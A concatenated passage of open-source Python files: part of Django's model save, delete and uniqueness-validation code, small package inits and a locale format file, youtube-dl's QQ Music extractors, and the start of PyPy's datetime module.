                    # If this is a model with an order_with_respect_to
                    # autopopulate the _order field
                    field = meta.order_with_respect_to
                    order_value = manager.using(using).filter(**{field.name: getattr(self, field.attname)}).count()
                    self._order = order_value
                if not pk_set:
                    if force_update:
                        raise ValueError("Cannot force an update in save() with no primary key.")
                    values = [(f, f.get_db_prep_save(raw and getattr(self, f.attname) or f.pre_save(self, True), connection=connection))
                        for f in meta.local_fields if not isinstance(f, AutoField)]
                else:
                    values = [(f, f.get_db_prep_save(raw and getattr(self, f.attname) or f.pre_save(self, True), connection=connection))
                        for f in meta.local_fields]
                record_exists = False
                update_pk = bool(meta.has_auto_field and not pk_set)
                if values:
                    # Create a new record.
                    result = manager._insert(values, return_id=update_pk, using=using)
                else:
                    # Create a new record with defaults for everything.
                    result = manager._insert([(meta.pk, connection.ops.pk_default_value())], return_id=update_pk, raw_values=True, using=using)
                if update_pk:
                    setattr(self, meta.pk.attname, result)
            transaction.commit_unless_managed(using=using)
        # Store the database on which the object was saved
        self._state.db = using
        # Once saved, this is no longer a to-be-added instance.
        self._state.adding = False
        # Signal that the save is complete
        if origin and not meta.auto_created:
            signals.post_save.send(sender=origin, instance=self,
                created=(not record_exists), raw=raw, using=using)
    save_base.alters_data = True
    def delete(self, using=None):
        """Delete this instance (and cascade per field rules) on ``using``."""
        using = using or router.db_for_write(self.__class__, instance=self)
        # Deleting an unsaved object is a programming error, not a no-op.
        assert self._get_pk_val() is not None, "%s object can't be deleted because its %s attribute is set to None." % (self._meta.object_name, self._meta.pk.attname)
        collector = Collector(using=using)
        collector.collect([self])
        collector.delete()
    # Flag used by the template system: calling this mutates state.
    delete.alters_data = True
    def _get_FIELD_display(self, field):
        """Return the human-readable choice label for a field with choices,
        falling back to the raw value when it is not a declared choice."""
        value = getattr(self, field.attname)
        return force_unicode(dict(field.flatchoices).get(value, value), strings_only=True)
    def _get_next_or_previous_by_FIELD(self, field, is_next, **kwargs):
        """Return the neighbouring row ordered by ``field`` (then pk).

        Backs the generated get_next_by_X / get_previous_by_X methods.
        Raises DoesNotExist when no neighbour matches.
        """
        if not self.pk:
            raise ValueError("get_next/get_previous cannot be used on unsaved objects.")
        op = is_next and 'gt' or 'lt'
        order = not is_next and '-' or ''
        param = smart_str(getattr(self, field.attname))
        # Ties on the field value are broken deterministically by pk.
        q = Q(**{'%s__%s' % (field.name, op): param})
        q = q|Q(**{field.name: param, 'pk__%s' % op: self.pk})
        qs = self.__class__._default_manager.using(self._state.db).filter(**kwargs).filter(q).order_by('%s%s' % (order, field.name), '%spk' % order)
        try:
            return qs[0]
        except IndexError:
            raise self.DoesNotExist("%s matching query does not exist." % self.__class__._meta.object_name)
    def _get_next_or_previous_in_order(self, is_next):
        """Return the neighbouring row by the implicit ``_order`` column for
        models declared with order_with_respect_to; result is memoized."""
        cachename = "__%s_order_cache" % is_next
        if not hasattr(self, cachename):
            op = is_next and 'gt' or 'lt'
            order = not is_next and '-_order' or '_order'
            order_field = self._meta.order_with_respect_to
            # Compare _order against this row's own _order via a subquery.
            obj = self._default_manager.filter(**{
                order_field.name: getattr(self, order_field.attname)
            }).filter(**{
                '_order__%s' % op: self._default_manager.values('_order').filter(**{
                    self._meta.pk.name: self.pk
                })
            }).order_by(order)[:1].get()
            setattr(self, cachename, obj)
        return getattr(self, cachename)
    def prepare_database_save(self, unused):
        # When a model instance is assigned to a FK value in a query, persist
        # its primary key rather than the object itself.
        return self.pk
    def clean(self):
        """
        Hook for doing any extra model-wide validation after clean() has been
        called on every field by self.clean_fields. Any ValidationError raised
        by this method will not be associated with a particular field; it will
        have a special-case association with the field defined by NON_FIELD_ERRORS.
        """
        # Intentionally a no-op; subclasses override to add cross-field checks.
        pass
    def validate_unique(self, exclude=None):
        """
        Checks unique constraints on the model and raises ``ValidationError``
        if any failed.

        ``exclude`` is a list of field names to skip (e.g. fields a ModelForm
        did not include or that already failed validation).
        """
        unique_checks, date_checks = self._get_unique_checks(exclude=exclude)
        errors = self._perform_unique_checks(unique_checks)
        date_errors = self._perform_date_checks(date_checks)
        # Merge date-based errors into the per-field error dict.
        for k, v in date_errors.items():
            errors.setdefault(k, []).extend(v)
        if errors:
            raise ValidationError(errors)
    def _get_unique_checks(self, exclude=None):
        """
        Gather a list of checks to perform. Since validate_unique could be
        called from a ModelForm, some fields may have been excluded; we can't
        perform a unique check on a model that is missing fields involved
        in that check.
        Fields that did not validate should also be excluded, but they need
        to be passed in via the exclude argument.

        Returns (unique_checks, date_checks):
          unique_checks: list of (model_class, (field_name, ...)) tuples
          date_checks:   list of (model_class, lookup_type, field, unique_for)
        """
        if exclude is None:
            exclude = []
        unique_checks = []
        unique_togethers = [(self.__class__, self._meta.unique_together)]
        for parent_class in self._meta.parents.keys():
            if parent_class._meta.unique_together:
                unique_togethers.append((parent_class, parent_class._meta.unique_together))
        for model_class, unique_together in unique_togethers:
            for check in unique_together:
                for name in check:
                    # If this is an excluded field, don't add this check.
                    if name in exclude:
                        break
                else:
                    # for/else: only add the check when no field was excluded.
                    unique_checks.append((model_class, tuple(check)))
        # These are checks for the unique_for_<date/year/month>.
        date_checks = []
        # Gather a list of checks for fields declared as unique and add them to
        # the list of checks.
        fields_with_class = [(self.__class__, self._meta.local_fields)]
        for parent_class in self._meta.parents.keys():
            fields_with_class.append((parent_class, parent_class._meta.local_fields))
        for model_class, fields in fields_with_class:
            for f in fields:
                name = f.name
                if name in exclude:
                    continue
                if f.unique:
                    unique_checks.append((model_class, (name,)))
                if f.unique_for_date and f.unique_for_date not in exclude:
                    date_checks.append((model_class, 'date', name, f.unique_for_date))
                if f.unique_for_year and f.unique_for_year not in exclude:
                    date_checks.append((model_class, 'year', name, f.unique_for_year))
                if f.unique_for_month and f.unique_for_month not in exclude:
                    date_checks.append((model_class, 'month', name, f.unique_for_month))
        return unique_checks, date_checks
    def _perform_unique_checks(self, unique_checks):
        """Run the given uniqueness checks against the database.

        Returns a dict mapping field name (or NON_FIELD_ERRORS for
        unique_together violations) to a list of error messages.
        """
        errors = {}
        for model_class, unique_check in unique_checks:
            # Try to look up an existing object with the same values as this
            # object's values for all the unique field.
            lookup_kwargs = {}
            for field_name in unique_check:
                f = self._meta.get_field(field_name)
                lookup_value = getattr(self, f.attname)
                if lookup_value is None:
                    # no value, skip the lookup
                    continue
                if f.primary_key and not self._state.adding:
                    # no need to check for unique primary key when editing
                    continue
                lookup_kwargs[str(field_name)] = lookup_value
            # some fields were skipped, no reason to do the check
            if len(unique_check) != len(lookup_kwargs.keys()):
                continue
            qs = model_class._default_manager.filter(**lookup_kwargs)
            # Exclude the current object from the query if we are editing an
            # instance (as opposed to creating a new one)
            if not self._state.adding and self.pk is not None:
                qs = qs.exclude(pk=self.pk)
            if qs.exists():
                if len(unique_check) == 1:
                    # Single-field constraint: report against that field.
                    key = unique_check[0]
                else:
                    key = NON_FIELD_ERRORS
                errors.setdefault(key, []).append(self.unique_error_message(model_class, unique_check))
        return errors
    def _perform_date_checks(self, date_checks):
        """Run unique_for_date/year/month checks; return {field: [messages]}."""
        errors = {}
        for model_class, lookup_type, field, unique_for in date_checks:
            lookup_kwargs = {}
            # there's a ticket to add a date lookup, we can remove this special
            # case if that makes it's way in
            date = getattr(self, unique_for)
            if date is None:
                # The date side of the constraint is unset; nothing to check.
                continue
            if lookup_type == 'date':
                lookup_kwargs['%s__day' % unique_for] = date.day
                lookup_kwargs['%s__month' % unique_for] = date.month
                lookup_kwargs['%s__year' % unique_for] = date.year
            else:
                lookup_kwargs['%s__%s' % (unique_for, lookup_type)] = getattr(date, lookup_type)
            lookup_kwargs[field] = getattr(self, field)
            qs = model_class._default_manager.filter(**lookup_kwargs)
            # Exclude the current object from the query if we are editing an
            # instance (as opposed to creating a new one)
            if not self._state.adding and self.pk is not None:
                qs = qs.exclude(pk=self.pk)
            if qs.exists():
                errors.setdefault(field, []).append(
                    self.date_error_message(lookup_type, field, unique_for)
                )
        return errors
    def date_error_message(self, lookup_type, field, unique_for):
        """Build the localized message for a unique_for_* violation."""
        opts = self._meta
        return _(u"%(field_name)s must be unique for %(date_field)s %(lookup)s.") % {
            'field_name': unicode(capfirst(opts.get_field(field).verbose_name)),
            'date_field': unicode(capfirst(opts.get_field(unique_for).verbose_name)),
            'lookup': lookup_type,
        }
    def unique_error_message(self, model_class, unique_check):
        """Build the localized message for a unique / unique_together violation.

        ``unique_check`` is the tuple of field names in the failed constraint.
        """
        opts = model_class._meta
        model_name = capfirst(opts.verbose_name)
        # A unique field
        if len(unique_check) == 1:
            field_name = unique_check[0]
            field_label = capfirst(opts.get_field(field_name).verbose_name)
            # Insert the error into the error dict, very sneaky
            return _(u"%(model_name)s with this %(field_label)s already exists.") % {
                'model_name': unicode(model_name),
                'field_label': unicode(field_label)
            }
        # unique_together
        else:
            # Join all field labels ("a, b and c") into one phrase.
            field_labels = map(lambda f: capfirst(opts.get_field(f).verbose_name), unique_check)
            field_labels = get_text_list(field_labels, _('and'))
            return _(u"%(model_name)s with this %(field_label)s already exists.") % {
                'model_name': unicode(model_name),
                'field_label': unicode(field_labels)
            }
    def full_clean(self, exclude=None):
        """
        Calls clean_fields, clean, and validate_unique, on the model,
        and raises a ``ValidationError`` for any errors that occurred.

        All three phases run even if an earlier one fails, so the caller
        receives the full set of errors in one exception.
        """
        errors = {}
        if exclude is None:
            exclude = []
        try:
            self.clean_fields(exclude=exclude)
        except ValidationError, e:
            errors = e.update_error_dict(errors)
        # Form.clean() is run even if other validation fails, so do the
        # same with Model.clean() for consistency.
        try:
            self.clean()
        except ValidationError, e:
            errors = e.update_error_dict(errors)
        # Run unique checks, but only for fields that passed validation.
        for name in errors.keys():
            if name != NON_FIELD_ERRORS and name not in exclude:
                exclude.append(name)
        try:
            self.validate_unique(exclude=exclude)
        except ValidationError, e:
            errors = e.update_error_dict(errors)
        if errors:
            raise ValidationError(errors)
    def clean_fields(self, exclude=None):
        """
        Cleans all fields and raises a ValidationError containing message_dict
        of all validation errors if any occur.

        Each field's cleaned value is written back onto the instance.
        """
        if exclude is None:
            exclude = []
        errors = {}
        for f in self._meta.fields:
            if f.name in exclude:
                continue
            # Skip validation for empty fields with blank=True. The developer
            # is responsible for making sure they have a valid value.
            raw_value = getattr(self, f.attname)
            if f.blank and raw_value in validators.EMPTY_VALUES:
                continue
            try:
                setattr(self, f.attname, f.clean(raw_value, self))
            except ValidationError, e:
                errors[f.name] = e.messages
        if errors:
            raise ValidationError(errors)
############################################
# HELPER FUNCTIONS (CURRIED MODEL METHODS) #
############################################
# ORDERING METHODS #########################
def method_set_order(ordered_obj, self, id_list, using=None):
    """Curried onto models as set_RELATED_order(): rewrite the _order column
    of ``ordered_obj`` rows related to ``self`` to follow ``id_list``."""
    if using is None:
        using = DEFAULT_DB_ALIAS
    rel_val = getattr(self, ordered_obj._meta.order_with_respect_to.rel.field_name)
    order_name = ordered_obj._meta.order_with_respect_to.name
    # FIXME: It would be nice if there was an "update many" version of update
    # for situations like this.
    for i, j in enumerate(id_list):
        ordered_obj.objects.filter(**{'pk': j, order_name: rel_val}).update(_order=i)
    transaction.commit_unless_managed(using=using)
def method_get_order(ordered_obj, self):
    """Curried onto models as get_RELATED_order(): return the pks of related
    ``ordered_obj`` rows in their current _order."""
    rel_val = getattr(self, ordered_obj._meta.order_with_respect_to.rel.field_name)
    order_name = ordered_obj._meta.order_with_respect_to.name
    pk_name = ordered_obj._meta.pk.name
    return [r[pk_name] for r in
            ordered_obj.objects.filter(**{order_name: rel_val}).values(pk_name)]
##############################################
# HELPER FUNCTIONS (CURRIED MODEL FUNCTIONS) #
##############################################
def get_absolute_url(opts, func, self, *args, **kwargs):
    """Call the model's get_absolute_url, honouring any override declared in
    settings.ABSOLUTE_URL_OVERRIDES for 'app_label.module_name'."""
    return settings.ABSOLUTE_URL_OVERRIDES.get('%s.%s' % (opts.app_label, opts.module_name), func)(self, *args, **kwargs)
########
# MISC #
########
class Empty(object):
    """Placeholder new-style class with no behaviour of its own."""
    pass
def simple_class_factory(model, attrs):
    """Used to unpickle Models without deferred fields.
    We need to do this the hard way, rather than just using
    the default __reduce__ implementation, because of a
    __deepcopy__ problem in Python 2.4
    """
    # ``attrs`` is ignored here; it matches deferred_class_factory's signature.
    return model
def model_unpickle(model, attrs, factory):
    """
    Used to unpickle Model subclasses with deferred fields.

    ``factory`` rebuilds the (possibly dynamically created) class; the
    instance is created without running __init__ — pickle restores __dict__.
    """
    cls = factory(model, attrs)
    return cls.__new__(cls)
# Required by some picklers to allow this global during unpickling.
model_unpickle.__safe_for_unpickle__ = True
# Factory for the per-model DoesNotExist / MultipleObjectsReturned classes.
if sys.version_info < (2, 5):
    # Prior to Python 2.5, Exception was an old-style class
    def subclass_exception(name, parents, unused):
        # Old-style classes are created via types.ClassType; the module
        # argument is not applicable and is ignored.
        return types.ClassType(name, parents, {})
else:
    def subclass_exception(name, parents, module):
        # New-style exception subclass, tagged with its defining module.
        return type(name, parents, {'__module__': module})
|
pwoodworth/intellij-community | refs/heads/master | python/testData/copyPaste/SelectionOneLine3.dst.py | 83 | class MyClass(object):
member1 = 1
<selection> member2 = 2<caret></selection>
member3 = 3 |
jwilk/mwic | refs/heads/master | lib/__init__.py | 1 | '''
mwic's private modules
'''
type(lambda: (yield from [])) # Python >= 3.3 is required
|
caisq/tensorflow | refs/heads/master | tensorflow/contrib/tfprof/__init__.py | 79 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""tfprof is a tool that profile various aspect of TensorFlow model.
@@model_analyzer
@@tfprof_logger
@@ProfileContext
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.contrib.tfprof import model_analyzer
from tensorflow.contrib.tfprof import tfprof_logger
from tensorflow.contrib.tfprof.model_analyzer import ProfileContext
from tensorflow.python.util.all_util import remove_undocumented
_allowed_symbols = ['model_analyzer', 'tfprof_logger', 'ProfileContext']
remove_undocumented(__name__, _allowed_symbols)
|
yask123/django | refs/heads/master | django/conf/locale/kn/formats.py | 619 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y'
TIME_FORMAT = 'h:i A'
# DATETIME_FORMAT =
# YEAR_MONTH_FORMAT =
MONTH_DAY_FORMAT = 'j F'
SHORT_DATE_FORMAT = 'j M Y'
# SHORT_DATETIME_FORMAT =
# FIRST_DAY_OF_WEEK =
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# DATE_INPUT_FORMATS =
# TIME_INPUT_FORMATS =
# DATETIME_INPUT_FORMATS =
# DECIMAL_SEPARATOR =
# THOUSAND_SEPARATOR =
# NUMBER_GROUPING =
|
lycantropos/VKApp | refs/heads/master | vk_app/__init__.py | 2 | from .app import App
|
yasoob/youtube-dl-GUI | refs/heads/master | youtube_dl/extractor/qqmusic.py | 38 | # coding: utf-8
from __future__ import unicode_literals
import random
import re
import time
from .common import InfoExtractor
from ..utils import (
clean_html,
ExtractorError,
strip_jsonp,
unescapeHTML,
)
class QQMusicIE(InfoExtractor):
    """Extractor for single QQ Music song pages (y.qq.com/n/yqq/song/...)."""
    IE_NAME = 'qqmusic'
    IE_DESC = 'QQ音乐'
    _VALID_URL = r'https?://y\.qq\.com/n/yqq/song/(?P<id>[0-9A-Za-z]+)\.html'
    _TESTS = [{
        'url': 'https://y.qq.com/n/yqq/song/004295Et37taLD.html',
        'md5': '5f1e6cea39e182857da7ffc5ef5e6bb8',
        'info_dict': {
            'id': '004295Et37taLD',
            'ext': 'mp3',
            'title': '可惜没如果',
            'release_date': '20141227',
            'creator': '林俊杰',
            'description': 'md5:d85afb3051952ecc50a1ee8a286d1eac',
            'thumbnail': r're:^https?://.*\.jpg$',
        }
    }, {
        'note': 'There is no mp3-320 version of this song.',
        'url': 'https://y.qq.com/n/yqq/song/004MsGEo3DdNxV.html',
        'md5': 'fa3926f0c585cda0af8fa4f796482e3e',
        'info_dict': {
            'id': '004MsGEo3DdNxV',
            'ext': 'mp3',
            'title': '如果',
            'release_date': '20050626',
            'creator': '李季美',
            'description': 'md5:46857d5ed62bc4ba84607a805dccf437',
            'thumbnail': r're:^https?://.*\.jpg$',
        }
    }, {
        'note': 'lyrics not in .lrc format',
        'url': 'https://y.qq.com/n/yqq/song/001JyApY11tIp6.html',
        'info_dict': {
            'id': '001JyApY11tIp6',
            'ext': 'mp3',
            'title': 'Shadows Over Transylvania',
            'release_date': '19970225',
            'creator': 'Dark Funeral',
            'description': 'md5:c9b20210587cbcd6836a1c597bab4525',
            'thumbnail': r're:^https?://.*\.jpg$',
        },
        'params': {
            'skip_download': True,
        },
    }]
    # Known audio renditions: URL prefix, container and relative preference.
    _FORMATS = {
        'mp3-320': {'prefix': 'M800', 'ext': 'mp3', 'preference': 40, 'abr': 320},
        'mp3-128': {'prefix': 'M500', 'ext': 'mp3', 'preference': 30, 'abr': 128},
        'm4a': {'prefix': 'C200', 'ext': 'm4a', 'preference': 10}
    }
    # Reference: m_r_GetRUin() in top_player.js
    # http://imgcache.gtimg.cn/music/portal_v3/y/top_player.js
    @staticmethod
    def m_r_get_ruin():
        """Replicate the site's pseudo-random GUID used for stream URLs."""
        curMs = int(time.time() * 1000) % 1000
        return int(round(random.random() * 2147483647) * curMs % 1E10)
    def _real_extract(self, url):
        mid = self._match_id(url)
        detail_info_page = self._download_webpage(
            'http://s.plcloud.music.qq.com/fcgi-bin/fcg_yqq_song_detail_info.fcg?songmid=%s&play=0' % mid,
            mid, note='Download song detail info',
            errnote='Unable to get song detail info', encoding='gbk')
        song_name = self._html_search_regex(
            r"songname:\s*'([^']+)'", detail_info_page, 'song name')
        publish_time = self._html_search_regex(
            r'发行时间:(\d{4}-\d{2}-\d{2})', detail_info_page,
            'publish time', default=None)
        if publish_time:
            publish_time = publish_time.replace('-', '')
        singer = self._html_search_regex(
            r"singer:\s*'([^']+)", detail_info_page, 'singer', default=None)
        lrc_content = self._html_search_regex(
            r'<div class="content" id="lrc_content"[^<>]*>([^<>]+)</div>',
            detail_info_page, 'LRC lyrics', default=None)
        if lrc_content:
            lrc_content = lrc_content.replace('\\n', '\n')
        thumbnail_url = None
        albummid = self._search_regex(
            [r'albummid:\'([0-9a-zA-Z]+)\'', r'"albummid":"([0-9a-zA-Z]+)"'],
            detail_info_page, 'album mid', default=None)
        if albummid:
            thumbnail_url = 'http://i.gtimg.cn/music/photo/mid_album_500/%s/%s/%s.jpg' \
                            % (albummid[-2:-1], albummid[-1], albummid)
        guid = self.m_r_get_ruin()
        vkey = self._download_json(
            'http://base.music.qq.com/fcgi-bin/fcg_musicexpress.fcg?json=3&guid=%s' % guid,
            mid, note='Retrieve vkey', errnote='Unable to get vkey',
            transform_source=strip_jsonp)['key']
        formats = []
        for format_id, details in self._FORMATS.items():
            formats.append({
                'url': 'http://cc.stream.qqmusic.qq.com/%s%s.%s?vkey=%s&guid=%s&fromtag=0'
                       % (details['prefix'], mid, details['ext'], vkey, guid),
                'format': format_id,
                'format_id': format_id,
                'preference': details['preference'],
                'abr': details.get('abr'),
            })
        self._check_formats(formats, mid)
        self._sort_formats(formats)
        # BUGFIX: lrc_content is None when the page has no lyrics div
        # (default=None above); re.findall(pattern, None) would raise
        # TypeError, so fall back to an empty string.
        actual_lrc_lyrics = ''.join(
            line + '\n' for line in re.findall(
                r'(?m)^(\[[0-9]{2}:[0-9]{2}(?:\.[0-9]{2,})?\][^\n]*|\[[^\]]*\])', lrc_content or ''))
        info_dict = {
            'id': mid,
            'formats': formats,
            'title': song_name,
            'release_date': publish_time,
            'creator': singer,
            'description': lrc_content,
            'thumbnail': thumbnail_url
        }
        # Only attach subtitles when the lyrics are in timed .lrc form.
        if actual_lrc_lyrics:
            info_dict['subtitles'] = {
                'origin': [{
                    'ext': 'lrc',
                    'data': actual_lrc_lyrics,
                }]
            }
        return info_dict
class QQPlaylistBaseIE(InfoExtractor):
    """Shared helpers for the QQ Music playlist-style extractors."""
    @staticmethod
    def qq_static_url(category, mid):
        # Static pages are sharded by the last two characters of the mid.
        return 'http://y.qq.com/y/static/%s/%s/%s/%s.html' % (category, mid[-2], mid[-1], mid)
    def get_singer_all_songs(self, singmid, num):
        """Fetch (as JSON text) up to ``num`` songs for the singer ``singmid``."""
        return self._download_webpage(
            r'https://c.y.qq.com/v8/fcg-bin/fcg_v8_singer_track_cp.fcg', singmid,
            query={
                'format': 'json',
                'inCharset': 'utf8',
                'outCharset': 'utf-8',
                'platform': 'yqq',
                'needNewCode': 0,
                'singermid': singmid,
                'order': 'listen',
                'begin': 0,
                'num': num,
                'songstatus': 1,
            })
    def get_entries_from_page(self, singmid):
        """Return url_result entries for every song of the given singer."""
        entries = []
        default_num = 1
        # First request only learns the total count; second fetches them all.
        json_text = self.get_singer_all_songs(singmid, default_num)
        json_obj_all_songs = self._parse_json(json_text, singmid)
        if json_obj_all_songs['code'] == 0:
            total = json_obj_all_songs['data']['total']
            json_text = self.get_singer_all_songs(singmid, total)
            json_obj_all_songs = self._parse_json(json_text, singmid)
            for item in json_obj_all_songs['data']['list']:
                if item['musicData'].get('songmid') is not None:
                    songmid = item['musicData']['songmid']
                    entries.append(self.url_result(
                        r'https://y.qq.com/n/yqq/song/%s.html' % songmid, 'QQMusic', songmid))
        return entries
class QQMusicSingerIE(QQPlaylistBaseIE):
    """Extractor for QQ Music singer pages: yields a playlist of their songs."""
    IE_NAME = 'qqmusic:singer'
    IE_DESC = 'QQ音乐 - 歌手'
    _VALID_URL = r'https?://y\.qq\.com/n/yqq/singer/(?P<id>[0-9A-Za-z]+)\.html'
    _TEST = {
        'url': 'https://y.qq.com/n/yqq/singer/001BLpXF2DyJe2.html',
        'info_dict': {
            'id': '001BLpXF2DyJe2',
            'title': '林俊杰',
            'description': 'md5:870ec08f7d8547c29c93010899103751',
        },
        'playlist_mincount': 12,
    }
    def _real_extract(self, url):
        mid = self._match_id(url)
        entries = self.get_entries_from_page(mid)
        singer_page = self._download_webpage(url, mid, 'Download singer page')
        singer_name = self._html_search_regex(
            r"singername\s*:\s*'(.*?)'", singer_page, 'singer name', default=None)
        singer_desc = None
        if mid:
            # Separate XML endpoint carries the singer biography/description.
            singer_desc_page = self._download_xml(
                'http://s.plcloud.music.qq.com/fcgi-bin/fcg_get_singer_desc.fcg', mid,
                # Fixed typo in the progress note ('Donwload' -> 'Download').
                'Download singer description XML',
                query={'utf8': 1, 'outCharset': 'utf-8', 'format': 'xml', 'singermid': mid},
                headers={'Referer': 'https://y.qq.com/n/yqq/singer/'})
            singer_desc = singer_desc_page.find('./data/info/desc').text
        return self.playlist_result(entries, mid, singer_name, singer_desc)
class QQMusicAlbumIE(QQPlaylistBaseIE):
    """Extractor for QQ Music album pages: yields a playlist of the tracks."""
    IE_NAME = 'qqmusic:album'
    IE_DESC = 'QQ音乐 - 专辑'
    _VALID_URL = r'https?://y\.qq\.com/n/yqq/album/(?P<id>[0-9A-Za-z]+)\.html'
    _TESTS = [{
        'url': 'https://y.qq.com/n/yqq/album/000gXCTb2AhRR1.html',
        'info_dict': {
            'id': '000gXCTb2AhRR1',
            'title': '我们都是这样长大的',
            'description': 'md5:179c5dce203a5931970d306aa9607ea6',
        },
        'playlist_count': 4,
    }, {
        'url': 'https://y.qq.com/n/yqq/album/002Y5a3b3AlCu3.html',
        'info_dict': {
            'id': '002Y5a3b3AlCu3',
            'title': '그리고...',
            'description': 'md5:a48823755615508a95080e81b51ba729',
        },
        'playlist_count': 8,
    }]
    def _real_extract(self, url):
        mid = self._match_id(url)
        # JSON endpoint returns album metadata plus the full track list.
        album = self._download_json(
            'http://i.y.qq.com/v8/fcg-bin/fcg_v8_album_info_cp.fcg?albummid=%s&format=json' % mid,
            mid, 'Download album page')['data']
        entries = [
            self.url_result(
                'https://y.qq.com/n/yqq/song/' + song['songmid'] + '.html', 'QQMusic', song['songmid']
            ) for song in album['list']
        ]
        album_name = album.get('name')
        album_detail = album.get('desc')
        if album_detail is not None:
            album_detail = album_detail.strip()
        return self.playlist_result(entries, mid, album_name, album_detail)
class QQMusicToplistIE(QQPlaylistBaseIE):
    """Extractor for QQ Music chart (toplist) pages."""
    IE_NAME = 'qqmusic:toplist'
    IE_DESC = 'QQ音乐 - 排行榜'
    _VALID_URL = r'https?://y\.qq\.com/n/yqq/toplist/(?P<id>[0-9]+)\.html'
    _TESTS = [{
        'url': 'https://y.qq.com/n/yqq/toplist/123.html',
        'info_dict': {
            'id': '123',
            'title': '美国iTunes榜',
            'description': 'md5:89db2335fdbb10678dee2d43fe9aba08',
        },
        'playlist_count': 100,
    }, {
        'url': 'https://y.qq.com/n/yqq/toplist/3.html',
        'info_dict': {
            'id': '3',
            'title': '巅峰榜·欧美',
            'description': 'md5:5a600d42c01696b26b71f8c4d43407da',
        },
        'playlist_count': 100,
    }, {
        'url': 'https://y.qq.com/n/yqq/toplist/106.html',
        'info_dict': {
            'id': '106',
            'title': '韩国Mnet榜',
            'description': 'md5:cb84b325215e1d21708c615cac82a6e7',
        },
        'playlist_count': 50,
    }]
    def _real_extract(self, url):
        list_id = self._match_id(url)
        # Chart metadata and entries come from a single JSON endpoint.
        toplist_json = self._download_json(
            'http://i.y.qq.com/v8/fcg-bin/fcg_v8_toplist_cp.fcg', list_id,
            note='Download toplist page',
            query={'type': 'toplist', 'topid': list_id, 'format': 'json'})
        entries = [self.url_result(
            'https://y.qq.com/n/yqq/song/' + song['data']['songmid'] + '.html', 'QQMusic',
            song['data']['songmid'])
            for song in toplist_json['songlist']]
        topinfo = toplist_json.get('topinfo', {})
        list_name = topinfo.get('ListName')
        list_description = topinfo.get('info')
        return self.playlist_result(entries, list_id, list_name, list_description)
class QQMusicPlaylistIE(QQPlaylistBaseIE):
    """Extractor for user-curated QQ Music playlists (歌单)."""
    IE_NAME = 'qqmusic:playlist'
    IE_DESC = 'QQ音乐 - 歌单'
    _VALID_URL = r'https?://y\.qq\.com/n/yqq/playlist/(?P<id>[0-9]+)\.html'
    _TESTS = [{
        'url': 'http://y.qq.com/n/yqq/playlist/3462654915.html',
        'info_dict': {
            'id': '3462654915',
            'title': '韩国5月新歌精选下旬',
            'description': 'md5:d2c9d758a96b9888cf4fe82f603121d4',
        },
        'playlist_count': 40,
        'skip': 'playlist gone',
    }, {
        'url': 'https://y.qq.com/n/yqq/playlist/1374105607.html',
        'info_dict': {
            'id': '1374105607',
            'title': '易入人心的华语民谣',
            'description': '民谣的歌曲易于传唱、、歌词朗朗伤口、旋律简单温馨。属于那种才入耳孔。却上心头的感觉。没有太多的复杂情绪。简单而直接地表达乐者的情绪,就是这样的简单才易入人心。',
        },
        'playlist_count': 20,
    }]
    def _real_extract(self, url):
        list_id = self._match_id(url)
        list_json = self._download_json(
            'http://i.y.qq.com/qzone-music/fcg-bin/fcg_ucc_getcdinfo_byids_cp.fcg',
            list_id, 'Download list page',
            query={'type': 1, 'json': 1, 'utf8': 1, 'onlysong': 0, 'disstid': list_id},
            transform_source=strip_jsonp)
        # An empty 'cdlist' means the playlist is missing; surface the site's
        # error code when one is provided.
        if not len(list_json.get('cdlist', [])):
            if list_json.get('code'):
                raise ExtractorError(
                    'QQ Music said: error %d in fetching playlist info' % list_json['code'],
                    expected=True)
            raise ExtractorError('Unable to get playlist info')
        cdlist = list_json['cdlist'][0]
        entries = [self.url_result(
            'https://y.qq.com/n/yqq/song/' + song['songmid'] + '.html', 'QQMusic', song['songmid'])
            for song in cdlist['songlist']]
        list_name = cdlist.get('dissname')
        list_description = clean_html(unescapeHTML(cdlist.get('desc')))
        return self.playlist_result(entries, list_id, list_name, list_description)
|
pombredanne/grumpy | refs/heads/master | grumpy-runtime-src/third_party/pypy/datetime.py | 6 | """Concrete date/time and related types -- prototype implemented in Python.
See http://www.zope.org/Members/fdrake/DateTimeWiki/FrontPage
See also http://dir.yahoo.com/Reference/calendars/
For a primer on DST, including many current DST rules, see
http://webexhibits.org/daylightsaving/
For more about DST than you ever wanted to know, see
ftp://elsie.nci.nih.gov/pub/
Sources for time zone and DST data: http://www.twinsun.com/tz/tz-link.htm
This was originally copied from the sandbox of the CPython CVS repository.
Thanks to Tim Peters for suggesting using it.
"""
# from __future__ import division
import time as _time
import math as _math
# import struct as _struct
import _struct
def divmod(x, y):
    """Integer divmod: return (floor quotient, remainder) of int(x), int(y).

    Shadows the builtin so the rest of this module always gets integer
    floor-division semantics.  The original body used `x / y`, which is
    floor division only under Python 2 classic division; `//` is floor
    division under both classic and true division, so this is correct
    even if `from __future__ import division` (commented out above) were
    ever enabled.
    """
    x, y = int(x), int(y)
    return x // y, x % y
_SENTINEL = object()
def _cmp(x, y):
return 0 if x == y else 1 if x > y else -1
def _round(x):
return int(_math.floor(x + 0.5) if x >= 0.0 else _math.ceil(x - 0.5))
MINYEAR = 1      # smallest year representable by date/datetime
MAXYEAR = 9999   # largest year representable by date/datetime
_MINYEARFMT = 1900  # strftime() cannot portably format years before this
_MAX_DELTA_DAYS = 999999999  # bound on |days| for a timedelta
# Utility functions, adapted from Python's Demo/classes/Dates.py, which
# also assumes the current Gregorian calendar indefinitely extended in
# both directions. Difference: Dates.py calls January 1 of year 0 day
